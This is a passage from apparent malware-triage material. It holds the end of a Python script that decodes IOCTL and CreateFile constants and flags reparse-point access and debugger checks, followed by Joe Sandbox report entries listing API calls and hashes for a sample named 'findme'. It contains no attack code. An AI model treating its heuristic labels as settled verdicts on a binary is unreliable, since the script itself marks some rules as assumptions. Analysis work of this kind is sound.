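        calls.append(ApiCall(m.group("api"), m.group("mod"), int(m.group("ref"), 16), args))
    return calls


# CTL_CODE(DeviceType, Function, Method, Access) = DeviceType<<16 | Access<<14 | Function<<2 | Method
IOCTL_METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
KNOWN_FSCTL = {
    0x000900A4: "FSCTL_SET_REPARSE_POINT",     # CTL_CODE(9, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
    0x000900A8: "FSCTL_GET_REPARSE_POINT",     # CTL_CODE(9, 42, METHOD_BUFFERED, FILE_ANY_ACCESS)
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",  # CTL_CODE(9, 43, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
}


def decode_ioctl(code: int) -> dict:
    """Split a DeviceIoControl code into its CTL_CODE fields and name it if known."""
    return {
        "device": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": IOCTL_METHODS[code & 0x3],
        "name": KNOWN_FSCTL.get(code),
    }


CREATEFILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CREATEFILE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                          4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CREATEFILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
                    0x00000080: "FILE_ATTRIBUTE_NORMAL"}


def decode_createfile(call: ApiCall) -> dict:
    """CreateFileW(name, access, share, sa, disposition, flags, template) -> symbolic names."""
    access, disp, flags = call.args[1], call.args[4], call.args[5]
    return {
        "access": [n for b, n in CREATEFILE_ACCESS.items() if access is not None and access & b],
        "disposition": CREATEFILE_DISPOSITION.get(disp),
        "flags": [n for b, n in CREATEFILE_FLAGS.items() if flags is not None and flags & b],
    }


# Assumption: this triple inside one function is the statically linked MSVC CRT's
# __raise_securityfailure / fault-reporting stub, not an intentional anti-debug check.
CRT_FAULT_STUB = {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}


def triage(calls: list) -> list:
    """Return (tag, detail) findings; the tags are this example's own labels."""
    findings = []
    for c in calls:
        if c.api == "DeviceIoControl" and len(c.args) > 1 and c.args[1] is not None:
            d = decode_ioctl(c.args[1])
            if d["name"] and "REPARSE" in d["name"]:
                findings.append(("reparse_point_ioctl", f"{d['name']} at {c.ref:08X}"))
        elif c.api == "CreateFileW" and len(c.args) > 5:
            d = decode_createfile(c)
            if "FILE_FLAG_OPEN_REPARSE_POINT" in d["flags"]:
                findings.append(("open_reparse_point",
                                 f"{'|'.join(d['access'])} {d['disposition']} at {c.ref:08X}"))
    names = {c.api for c in calls}
    if CRT_FAULT_STUB <= names:
        findings.append(("crt_fault_stub", "IsDebuggerPresent+SetUnhandledExceptionFilter(NULL)+UnhandledExceptionFilter"))
    elif "IsDebuggerPresent" in names:
        findings.append(("debugger_check", "IsDebuggerPresent outside the CRT stub pattern"))
    return findings


if __name__ == "__main__":
    for tag, detail in triage(parse_api_lines(SAMPLE_LINES)):
        print(f"{tag:22} {detail}")
```

Run it against one function entry at a time (the report lists calls per function) so that the CRT-stub rule only fires when all three calls sit in the same function; the name tables only cover the constants that occur in these entries and are meant to be extended as other IOCTLs or flags turn up.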
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: b340032adaa40007183443a00a6d8679d0dd257aab0ad9c7cf835352c881aecf
                    • Instruction ID: 98df20a137a32824868d2a842d250d9b814b925888871a3c4ef88a2ae5035400
                    • Opcode Fuzzy Hash: b340032adaa40007183443a00a6d8679d0dd257aab0ad9c7cf835352c881aecf
                    • Instruction Fuzzy Hash: A7314671800289AFCB249E7ACC84EFB7BBDDB81314F0401AEF51887251D638AD54CB54
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                    • Instruction ID: e2b928ea88b9fd69540999e773ba1d48d8a5ca898849991e2a7d6da8865ddbc9
                    • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                    • Instruction Fuzzy Hash: 64023D72E002599FDF14CFAAC8806AEBBF1EF48315F25416AD919E7384D735A942CB84
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004DA662
                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,004FE600,?,?), ref: 004DA6B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FormatInfoLocaleNumber
                    • String ID:
                    • API String ID: 2169056816-0
                    • Opcode ID: 80f32fcb88dd9670e12944e6e5fffa5b68adbcc90eae612122c419bea6a10061
                    • Instruction ID: 5c95018a84770a19d439298f2ac2d775a2237c57ae3c9f08f0bf71aca5ec2a76
                    • Opcode Fuzzy Hash: 80f32fcb88dd9670e12944e6e5fffa5b68adbcc90eae612122c419bea6a10061
                    • Instruction Fuzzy Hash: 72015E36110208BAE7108FA5DC06FABB7BCEF59711F404426BA04D7160E3759E24C7E9
                    APIs
                    • GetLastError.KERNEL32(004D117C,?,00000200), ref: 004C6EC9
                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 004C6EEA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 8190b31cdea8eec975488ba164cf08b9a16c31ae920a89c8dfb72f7badfa7f72
                    • Instruction ID: 14078ac10b19e9c3f0ac12dfa2ac49b65ff3f9d4c9d5e84f7134c34d9df7b16f
                    • Opcode Fuzzy Hash: 8190b31cdea8eec975488ba164cf08b9a16c31ae920a89c8dfb72f7badfa7f72
                    • Instruction Fuzzy Hash: EBD09E79284202BEEA510B748C05F277B546755B46F10C52AB256D90D4C9709025961E
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004F118F,?,?,00000008,?,?,004F0E2F,00000000), ref: 004F13C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 5f48d5e2d7349beadf70e089691252264d9f393ce96db4923c9bf8b2a1972960
                    • Instruction ID: c7ea61fb9137c35b2dfbe0d5cd9d68761dafa7f8639a94a24cdaa6adef88fe72
                    • Opcode Fuzzy Hash: 5f48d5e2d7349beadf70e089691252264d9f393ce96db4923c9bf8b2a1972960
                    • Instruction Fuzzy Hash: AFB14B31610609DFD715CF28C48AB657BE0FF45364F25869AEA99CF2A1C339E982CB44
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: gj
                    • API String ID: 0-4203073231
                    • Opcode ID: 1895f051780e1880dd6956519d8c446a13fe83af4e4d3f9d7759545bddc485f5
                    • Instruction ID: 35d859896f296d763e10aa2078cc5a63a3329c1e3aefb0ea671e1ef45dc00e1c
                    • Opcode Fuzzy Hash: 1895f051780e1880dd6956519d8c446a13fe83af4e4d3f9d7759545bddc485f5
                    • Instruction Fuzzy Hash: F4F1C3B1A083418FD758CF29D880A2AFBE1BFCC208F15892EF598D7711E634E9558B56
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004CAD1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Version
                    • String ID:
                    • API String ID: 1889659487-0
                    • Opcode ID: f458f145fbc31a36783f86e377ed97b3534d8cf30b4ba76f574b06e68abf53ca
                    • Instruction ID: 50f66f04cde513ec2042d962750fe50e1fdceae04edc3d98b5d850d98d5fe5f0
                    • Opcode Fuzzy Hash: f458f145fbc31a36783f86e377ed97b3534d8cf30b4ba76f574b06e68abf53ca
                    • Instruction Fuzzy Hash: BAF030B490021C8FC728CF18EC41BEA73B6F758715F2002AAD916537A4D774AD54DF5A
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,004DEAC5), ref: 004DF068
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 7c7c9137f9338d41925e3af504f065537cd6bd624dcb84b246bf6a0fbcb7005a
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: A1C196362091D30ADF2D867B853413FBAA15BA17B331A075FD4B3CB2C4FE68D5A49A14
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 27cb1713679e4d1033ce1f8e3fb24f58381a862d29841ab7447071e1a550285e
                    • Instruction ID: 90416aecf722f11dc4cc07171fab4e24a0cf7adea16d2ab5315105061f325a5d
                    • Opcode Fuzzy Hash: 27cb1713679e4d1033ce1f8e3fb24f58381a862d29841ab7447071e1a550285e
                    • Instruction Fuzzy Hash: 8AE125755183848FC304CF2AD8A096FBBF0AB9A300F89095EF5D597352D335EA19DB62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                    • Instruction ID: 59224f4cb08d1f4881eafb7d63bc2f568d7acdbb4bf6599c1a80773eeea64806
                    • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                    • Instruction Fuzzy Hash: 0C917B712047498BDB24EF64D8A0BBA73D5BB80308F10092FE59797382DA7CE655C75B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8acbb99eac4599627da41499eadc69e6ea876d16c95d3e660c09ce7b3d8211b8
                    • Instruction ID: c55ea542cb87a54c81b5fcbe55160764235a0fac4e110a8cad2f4ce754ff1184
                    • Opcode Fuzzy Hash: 8acbb99eac4599627da41499eadc69e6ea876d16c95d3e660c09ce7b3d8211b8
                    • Instruction Fuzzy Hash: 916168B16807C856DA34897B4855BBF23849BC131BF100A6FE582EB382D55DED42C75E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                    • Instruction ID: e32f501eee0392be472c7b9da8c1afff95faa653c7a5d46a77cb731d965fd8e7
                    • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                    • Instruction Fuzzy Hash: 3A711D717043494BDB24DF29C8E0F6E77E5AB91309F00492FE5868B382DA7CDA85875B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                    • Instruction ID: 68c819918219db26b185c87e9f6825524635a3f88c541e9f764807e2992ecfde
                    • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                    • Instruction Fuzzy Hash: EE5138756006C456DB345A6B88567BF6789ABC730BF18090BE982D7382C30CDD4283DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 735ce9c1fa4e61647e8728c8ed1d5ef16455fce50196aafacc9d5cefe6dec67b
                    • Instruction ID: 1991cb395c3b5fc9d6d476106be19034c256fd8c02801185b38860d2d51cc3d2
                    • Opcode Fuzzy Hash: 735ce9c1fa4e61647e8728c8ed1d5ef16455fce50196aafacc9d5cefe6dec67b
                    • Instruction Fuzzy Hash: 1E81919261A6E49EC7464F7D3CA46FE3FA15737300F1844BAC4C5862A3D13A466DEB22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab209ab061b7f9ce8e301962e332c68d158085b71fec8ce6e34b720aa4a0ca91
                    • Instruction ID: a950bcabaac4ea56a498ffb1d30dad84add286255a69d327bff5540dda28c111
                    • Opcode Fuzzy Hash: ab209ab061b7f9ce8e301962e332c68d158085b71fec8ce6e34b720aa4a0ca91
                    • Instruction Fuzzy Hash: 6551D0B85083D24EC712CF269184A6FBFE0BE9A318F49489EE4D54B213D335D649CB96
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • _swprintf.LIBCMT ref: 004CDABE
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                      • Part of subcall function 004D1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00500EE8,00000200,004CD202,00000000,?,00000050,00500EE8), ref: 004D15B3
                    • _strlen.LIBCMT ref: 004CDADF
                    • SetDlgItemTextW.USER32(?,004FE154,?), ref: 004CDB3F
                    • GetWindowRect.USER32(?,?), ref: 004CDB79
                    • GetClientRect.USER32(?,?), ref: 004CDB85
                    • GetWindowLongW.USER32(?,000000F0), ref: 004CDC25
                    • GetWindowRect.USER32(?,?), ref: 004CDC52
                    • SetWindowTextW.USER32(?,?), ref: 004CDC95
                    • GetSystemMetrics.USER32(00000008), ref: 004CDC9D
                    • GetWindow.USER32(?,00000005), ref: 004CDCA8
                    • GetWindowRect.USER32(00000000,?), ref: 004CDCD5
                    • GetWindow.USER32(00000000,00000002), ref: 004CDD47
                    Strings
                    Similarity
                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                    • String ID: $%s:$CAPTION$TO$d
                    • API String ID: 2407758923-3172838635
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 004EC277
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE2F
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE41
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE53
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE65
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE77
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE89
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE9B
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEAD
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEBF
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBED1
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEE3
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEF5
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBF07
                    • _free.LIBCMT ref: 004EC26C
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004EC28E
                    • _free.LIBCMT ref: 004EC2A3
                    • _free.LIBCMT ref: 004EC2AE
                    • _free.LIBCMT ref: 004EC2D0
                    • _free.LIBCMT ref: 004EC2E3
                    • _free.LIBCMT ref: 004EC2F1
                    • _free.LIBCMT ref: 004EC2FC
                    • _free.LIBCMT ref: 004EC334
